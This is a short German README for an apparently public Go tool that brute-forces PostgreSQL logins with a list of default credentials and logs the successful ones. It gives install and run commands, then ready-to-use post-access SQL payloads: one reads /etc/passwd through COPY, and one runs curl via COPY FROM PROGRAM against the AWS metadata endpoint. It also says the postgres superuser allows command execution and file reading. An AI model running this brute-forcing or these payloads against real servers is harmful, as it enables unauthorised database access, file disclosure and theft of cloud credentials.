
Dieses Tool nimmt eine Liste von Standard-Zugangsdaten, testet sie gegen einen PostgreSQL-Server und protokolliert alle, die funktionieren, sowie die Datenbanken, auf die es Zugriff hat.
Dieses Go-Skript liest eine Liste von Benutzernamen und Passwörtern aus einer Datei namens creds.txt und testet sie gegen eine PostgreSQL-Datenbank.
Das Skript akzeptiert die IP des PostgreSQL-Servers als Befehlszeilenargument oder eine Textdatei mit IPs.
Wenn ein Zugriff gewährt wird, schreibt das Skript diese Ausgabe in eine Datei namens pg-output.txt.
Wenn der Benutzer postgres verfügbar ist, ist dies normalerweise ein Superuser, der RCE oder LFI oder SSRf ermöglichen kann.
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest
go run postgres-brute.go 1.1.1.1
postgres
/etc/passwd/ abrufen
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
SSRF - AWS-Metadaten abrufen
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;